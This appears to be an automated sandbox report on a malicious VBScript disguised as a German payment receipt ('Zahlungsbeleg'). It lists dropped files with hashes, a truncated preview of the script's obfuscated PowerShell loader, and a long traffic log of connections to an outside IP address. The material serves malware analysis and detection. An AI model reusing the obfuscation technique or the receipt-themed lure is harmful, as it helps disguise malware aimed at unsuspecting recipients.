                        SSDEEP:384:uS+oul4HVBU/eAnAlj8zuiFhY4IO8mWA7L:uSXuaVBU/PAlj8zuiFhY4IO8m3
                        MD5:BEB077592AECE36023F010442C805E84
                        SHA1:1FB3A94D9D8AE435F09053C700AB8CB8F81A343D
                        SHA-256:667628773B1B7E14316348E502A5827918F9225C259024E86206C689C85A23E7
                        SHA-512:39295ED46327B55B0C8237F9B2C6E165AF38C75DD569D37E4DEBD3AA62282D4B5FD709DDDE01A9C3F5EC13C6EF6C3407306D1559ABC9A1D7ACAE24E892A9EAB1
                        Malicious:false
                        Preview:Version=1..EventType=BEX..EventTime=133592827754685149..ReportType=2..Consent=1..UploadTime=133592827787028862..ReportStatus=524384..ReportIdentifier=f5595536-7500-416e-9633-5d6e840a3c88..IntegratorReportIdentifier=a2629fba-5d6d-4749-8560-aed9f2c2a617..Wow64Host=34404..Wow64Guest=332..NsAppName=kOAlByYcnQDKnTplLRjSHzGyPq.exe..AppSessionGuid=00000da8-0001-0014-aaee-dbdbf79dda01..TargetAppId=W:0006bb1d41b012db1c066be559d45a19f2cc0000ffff!00005536b7532400baf27beb2bfd425159264ad71136!kOAlByYcnQDKnT
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Sat May 4 07:52:55 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):35878
                        Entropy (8bit):1.91497304949868
                        Encrypted:false
                        SSDEEP:192:Bc3IW6ecq3OKFsfThuLV2U3zcBcPpKbsl:W4W6me9ThuLV2CpPpN
                        MD5:DE03206F1D8E52A2DEA5FD47C66E0932
                        SHA1:E6EDA1F7B05669A7CD481C058F2AEDFBCC80BD0E
                        SHA-256:3BD1B2DA25AEB771069DF090A76962B8F0229CE1FC5E0A39D380E011EA3DC890
                        SHA-512:5887D2AB3CD2CCD9FB2B706792DD46F0BD7D00D8150A004E3D8765ED5B14905F77968E051EDDE516BAD26657CC92CD6C24C5ED6AE592A41F9F9AE79109911253
                        Malicious:false
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8492
                        Entropy (8bit):3.7142679300063386
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJq4EH6Ihv6Y9FSUGaETgmfEZfprp89bHIsf0ENm:R6lXJqTH6Ihv6Y/SUGaETgmfEZUH7f0D
                        MD5:6C813D29066B22260AD625FFA43AE319
                        SHA1:FAEB0E2B0D4E3E41344F9DCFE3629F322F558236
                        SHA-256:94A7A1F3A02642E812FFAC6DA9D3D66423B7B51712FBCDE3B593BA984DC0DA11
                        SHA-512:FCC4C285ACE50FD5A7CF991C7ABE05DEC0ADC4C5E7924E7622820CEAB834C36F0689CA78C03D00A104FDC594E79E8042CF1F94982986335A4244EAB24F346D59
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3496</Pi
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4800
                        Entropy (8bit):4.564903432445394
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsPJg77aI9yFWpW8VY+vYm8M4JiP5HFdhL+q8vv5H2bJ070Qd:uIjfxI7k07VxyJiPfLKvIF070Qd
                        MD5:F1C4B3DE8336583033A531F5E7D20692
                        SHA1:A6ACC4E407E5A7CE4EE31DED4502C2C83732DE6E
                        SHA-256:BD15C9B2C854491CF7378E1BA8750456F7A7727B8DA5182B4E9D7E9EF1DCA603
                        SHA-512:4D7DDED30432FC2D75C042B838E9A9E4370671AF69078341783F74A0187C379AE34A3D56984216530DEBE0EBA165940BBEA8B4C192D5A25FD59A0B74998214FA
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="308095" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\System32\wscript.exe
                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                        Category:dropped
                        Size (bytes):69993
                        Entropy (8bit):7.99584879649948
                        Encrypted:true
                        SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                        MD5:29F65BA8E88C063813CC50A4EA544E93
                        SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                        SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                        SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                        Malicious:false
                        Process:C:\Windows\System32\wscript.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):330
                        Entropy (8bit):3.236117150252365
                        Encrypted:false
                        SSDEEP:6:kKlN/lEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt://lbkPlE99SNxAhUeVLVt
                        MD5:362AB1917BCD50951026BA0396EFACD6
                        SHA1:B896A508DAC0D9007BF9B8998131175C21BBEF1B
                        SHA-256:E3E17F8B4CA9B30A984E848404CB1FA40095DAA406CB2C6FC71F773CBF16BBAE
                        SHA-512:D0A1FC161BD3CE94F255DD467A204E5D16655542CE0E8137BE66743561C02E3E334917733A57DF4B4D49C81ACCD68A9682EB13D07093A7D6D18904C4371F199C
                        Malicious:false
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):11608
                        Entropy (8bit):4.886255615007755
                        Encrypted:false
                        SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                        MD5:C7F7A26360E678A83AFAB85054B538EA
                        SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                        SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                        SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                        Malicious:false
                        Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1940658735648508
                        Encrypted:false
                        SSDEEP:3:Nlllulbnolz:NllUc
                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                        Malicious:false
                        Preview:@...e................................................@..........
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):416656
                        Entropy (8bit):5.962939321179034
                        Encrypted:false
                        SSDEEP:12288:V6rmeZEe7zWTcJLymuJu0dmnCGS1rc6+67:FePWTBzlB77
                        MD5:E504A53EE3C0D21CF89C447A0497C6E1
                        SHA1:711325CAD1137834E4593C40BCDA3E7C60902A8B
                        SHA-256:06364E5F7100395C2A5862CB01DC13B7C781EAFC641492BB60C80FB1391A2CEE
                        SHA-512:3A0832F64401D0EE52144F914F649983F9ED619761131F20B88070349229A26C97477EEE418D3D33841391D97E8C43B1D045FDE8075572B3BA796850D50FEA3D
                        Malicious:false
                        File type:ASCII text, with very long lines (544), with CRLF line terminators
                        Entropy (8bit):5.158760331338767
                        TrID:
                          File name:Zahlungsbeleg 202405029058.vbs
                          File size:214'551 bytes
                          MD5:913fa02445aa8092996ad3f000aa1ea1
                          SHA1:c29022193884baeb4aad8a94884995ea80bdeb25
                          SHA256:f9a51686ace6a200b6c9de7b9a8cd18c6ab67e6841ba64bf1518932ccd78bf78
                          SHA512:7bedf67bcf7fc15b6c3ce845fcbec3e7a936ebd72efa9a0b386eec5d15d7c1560b87aabb729114016862742c4e40299a7c4dc3ca810af06510b4d9b352196263
                          SSDEEP:6144:PJITON4vsj1oLXVAFN6oDpLfcW6PGOYQO+17ezWSUqE19eAV/KE3JSlkiuqIQK9Y:hcKJkRH3E
                          TLSH:5324B3E3CF0A36181F8A2FD5A865CD828AF741B171112478D5EED6EDA183EACC1F8D15
                          File Content Preview:.. ..Rem stningsled aporobranchian lorgnettere brnesygdommes. udliciterings.. .. .. .. .. ..Rem Harmoniseres! ildnendes placarder swaddler sjuskedorter..U4 = U4 + "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';gronchiction Tyknende($Frontotemp
                          Icon Hash:68d69b8f86ab9a86
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          May 4, 2024 09:51:40.563580990 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.563641071 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.563707113 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.563724041 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.563736916 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.563750982 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.563762903 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.563796043 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571011066 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571026087 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571038961 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571053982 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571067095 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571082115 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571095943 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571109056 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571119070 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571125984 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571140051 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571151018 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571151972 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571156979 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571163893 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571171999 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571187019 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571197987 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571202040 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571218014 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571229935 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571232080 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571248055 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571254969 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571261883 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571274042 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571275949 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571291924 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571305037 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571316957 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571317911 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571332932 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571347952 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571350098 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571362972 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571373940 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571377993 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571392059 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571402073 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571405888 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571420908 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571428061 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571435928 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571449041 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571449041 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571464062 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571477890 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571491957 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571492910 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571506023 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571517944 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571526051 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571535110 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571549892 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571552038 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571564913 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571578026 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571578026 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571594000 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571604013 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571608067 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.571628094 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.571645975 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.573610067 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573626041 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573689938 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.573712111 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573726892 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573740005 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573754072 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573762894 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.573767900 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573786020 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573798895 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573805094 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.573827982 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.573827982 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573843956 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.573883057 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574045897 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574060917 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574073076 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574093103 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574094057 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574106932 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574120998 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574126959 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574135065 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574152946 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574161053 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574170113 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574183941 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574187040 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574206114 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574235916 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574251890 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574266911 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574275017 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574281931 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574307919 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574328899 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574346066 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574357986 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574371099 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574378014 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574385881 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574402094 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574408054 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574417114 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574430943 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574440002 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574444056 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574457884 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574457884 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574472904 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574486971 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574498892 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574502945 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574517012 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574529886 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574529886 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574544907 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574553967 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574561119 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574573994 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574573994 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574589968 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574605942 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574640036 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574737072 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574750900 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574763060 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574775934 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574786901 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574791908 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574806929 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574820995 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574827909 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574835062 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574848890 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574862003 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574862003 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574883938 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574884892 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574899912 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574906111 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574914932 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574928045 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574942112 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574943066 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574956894 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574970961 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574974060 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.574985027 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.574999094 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.575001001 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.575012922 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.575018883 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.575035095 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.575047970 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.575059891 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.575063944 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.575079918 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.575083017 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.575129986 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.864088058 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864123106 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864137888 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864185095 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.864291906 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864319086 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864342928 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.864387989 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864420891 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864435911 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864449024 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864468098 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864475965 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.864475965 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.864516020 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864557981 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864573002 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864584923 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:40.864617109 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.864617109 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:40.864680052 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:51:45.568192005 CEST804973187.121.105.54192.168.2.4
                          May 4, 2024 09:51:45.568320036 CEST4973180192.168.2.487.121.105.54
                          May 4, 2024 09:52:12.977155924 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.285799026 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.285912037 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.286463976 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.594185114 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.597558975 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.597573042 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.597616911 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.597742081 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.597783089 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.597788095 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.597803116 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.597815990 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.597827911 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.597830057 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.597841024 CEST804973787.121.105.54192.168.2.4
                          May 4, 2024 09:52:13.597853899 CEST4973780192.168.2.487.121.105.54
                          May 4, 2024 09:52:13.597879887 CEST4973780192.168.2.487.121.105.54
